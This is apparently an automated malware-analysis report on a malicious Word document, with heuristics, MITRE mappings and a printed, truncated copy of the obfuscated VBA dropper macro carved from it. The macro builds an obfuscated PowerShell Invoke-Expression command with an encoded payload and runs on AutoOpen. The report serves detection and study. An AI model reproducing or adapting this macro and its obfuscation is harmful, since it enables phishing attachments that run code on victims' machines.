MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, so the macro runs as soon as the document is opened. The macro calls Shell() to launch a PowerShell command that is assembled at run time by concatenating many short string fragments, among them `OwerSHell & ((vARiAbLE '*mDR*').NAME[3,11,2]-jOIn ' ') ( "$( SeT-VaRiable 'OfS' '')$" + [St`. The `(variable '*mdr*').Name[3,11,2]` indexing is a common PowerShell obfuscation that derives the alias "iex" (Invoke-Expression) from the name of the automatic variable MaximumDriveCount, so the rest of the assembled string is an encoded payload that is decoded and then executed. This indicates the document is likely a spearphishing attachment designed to download and execute a secondary payload.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6584902-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6584902-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11710 bytes |

SHA-256: 963f9f140957cae1602828551827c42577008db34f4bfb64d24da45c5fe08d51

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "rijHcrGiz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ziLtmSwPswqr"
Function BoCFr()
On Error Resume Next
cQnzVI = CByte(wjcRFY)
raFUz = 24061
wjhVO = CDate(39275)
dEGMS = CDate(sWGhw + Sin(6690 + 10844) * 18613 * CInt(8890))
VNOkNp = 49756
tbYAhQ = KrFDQh
sWPKUEaQElX = "OwerSHell" + " & ((vARiAb" + "lE '*mDR*')" + ".NAM" + "E[3,11,2]-jOI" + "n'') ( " + Chr(34) + "$( " + "SeT-VaR" + "iAble 'Of" + "S' '')" + Chr(34) + "+[St"
BSIrC = CByte(tpTfNF)
mZGuD = 64734
VNBbpD = CDate(79124)
wlKsz = CDate(YUNFn + Sin(5992 + 84986) * 79140 * CInt(74451))
lDEnbd = 91099
ZfOzkl = mGkQqC
PVUviik = "RiNG]('11E7" + "6>77G121~" + "66>90>" + "76E" + "15N18r15K65N" + "74d88>2r64d77" + "~69~74d76K91~" + "15r93L78L65!" + "75!64" + "N6"
CDfaGC = CByte(prnMv)
mCEHMF = 11008
lMsiR = CDate(4259)
NwwlF = CDate(ZZjcPf + Sin(29461 + 24104) * 8468 * CInt(63497))
zFfVUG = 50017
PwIcjO = rlaOs
SorcI = "6K20N11>" + "64N107E99~109E6" + "7L15~18~1" + "5!65d74N88r2!"
jKjfIS = CByte(tqihr)
YLGYK = 65434
TVLhwp = CDate(24561)
HAwbpu = CDate(fsdAiK + Sin(10770 + 30758) * 64633 * CInt(25423))
VKdkGO = 45882
UhKRhX = ACoSD
HiQKGctJU = "64>77>69r74>" + "76~9" + "1G15d124E86d92" + "d91>74!66E1r97" + "~74L91r1!12" + "0K74E77d108d6"
BoCFr = sWPKUEaQElX + PVUviik + SorcI + HiQKGctJU
End Function
Function WRwBMT()
On Error Resume Next
IjNFdT = CByte(VfQqS)
JhGlj = 62209
NoszMo = CDate(38155)
XDhFzJ = CDate(wwvTj + Sin(81038 + 10103) * 32866 * CInt(78315))
SYjOw = 1713
ojrDfq = rGrdfl
MzJmXK = "7!70!" + "74G65" + "!9" + "1~2" + "0>11d96K123E9" + "8~93" + "G117r1" + "5K18K15d"
kHXDNX = CByte(cXrNz)
IUaNl = 2024
sRiQM = CDate(88421)
zjTkI = CDate(LYkiwV + Sin(20079 + 12098) * 42356 * CInt(67634))
dKGZjU = 44967
cYdDE = tThmls
zImjnr = "8K71N9" + "1d" + "91E95L2" + "1d0L0E31G24r" + "26r26>75N65~7" + "8N69!75K1K76K64" + "L66G0!2" + "5L" + "87d88>78N93L1"
roHWic = CByte(oQGvBa)
fWOvr = 74391
bzZfM = CDate(42696)
vzUUvT = CDate(uQWMpA + Sin(54209 + 84903) * 59920 * CInt(28093))
nvdMhr = 86686
wTjKG = zNVTjn
OrCUK = "25>74r77!92L0" + ">111d71" + "r91G91d95L21r0K" + "0!64K88L65L2L91" + "L93~"
LZpjSL = CByte(PCzkq)
jVQCtn = 16828
VhzMNd = CDate(39203)
SmjAsM = CDate(nLmLW + Sin(14124 + 76839) * 77112 * CInt(62544))
nJHtz = 70136
ObjQUQ = BIjGL
IRcYpYvuX = "78E65r92L" + "95N64>" + "93N91L1" + "d76G64~66E0r95d" + "90!77L0N119d72N" + "98N121d74L28!0" + "r111G71>91L91K"
WhtQc = CByte(BnQwVV)
ZFjOR = 73998
jjQbQG = CDate(80935)
FuAXB = CDate(dhndFl + Sin(62409 + 72361) * 98339 * CInt(24521))
ZwwcqL = 49357
SjTclu = njpRi
nvkNwXDkk = "95d21>0L0L88r88" + "L88L1r66L92G68>" + "95d93E64L74d" + "68K91N1r93!9" + "0>0>77N72E107"
kTwhD = CByte(wZWdTz)
PQiBiU = 68685
kSwMzn = CDate(8376)
BRTMTB = CDate(UuVIaC + Sin(5138 + 31266) * 83616 * CInt(69682))
taLYGc = 38919
TbfMkw = KIHNMH
NiUfH = "~73!123L1" + "26G104G" + "117E127K0" + "r111r" + "71r91G"
CGbUUc = CByte(ohVZJ)
srOuOn = 88399
lHiOTK = CDate(72454)
PMPvo = CDate(akcnN + Sin(58595 + 50835) * 9511 * CInt(11736))
FEbHKZ = 61824
mVnwuU = ualUz
DoCaDpHjq = "91r95E21L" + "0L0N88G8" + "8N88r1L" + "66G78K68" + "r22G" + "30>26K23~3" + "1>31N1N93!9" + "0L0>" + "106!106N12"
MiTjBw = CByte(wXpZvE)
MUlMu = 13044
UCCdr = CDate(69084)
zjMRMY = CDate(pjCqP + Sin(51508 + 66186) * 91629 * CInt(35911))
ZfGtD = 8088
vvQtqF = sprEdE
pbRTGpYnV = "4!127L12" + "6~30d25E22K8" + "7>105K0" + "G11" + "1G71K91~9" + "1E95~21!0K0" + "N88~88>88~1N6" + "8~" + "90d91K74~92~"
fdmZjO = CByte(wSDJiX)
wPAFj = 77626
WjJMb = CDate(73582)
voVALY = CDate(VCkzS + Sin(9718 + 24806) * 24115 * CInt(10347))
pZOIr = 74874
tqiPBi = PjpTt
HZKGE = "71L64d95K1d" + "68N70G74K65E" + "77N70d74!65~91" + "!74~" + "76d71G1K" + "76r64E66N" + "0L22K1" + "05r" + "30r23G110~" + "22"
WRwBMT = MzJmXK + zImjnr + OrCUK + IRcYpYvuX + nvkNwXDkk + NiUfH + Do
... (truncated)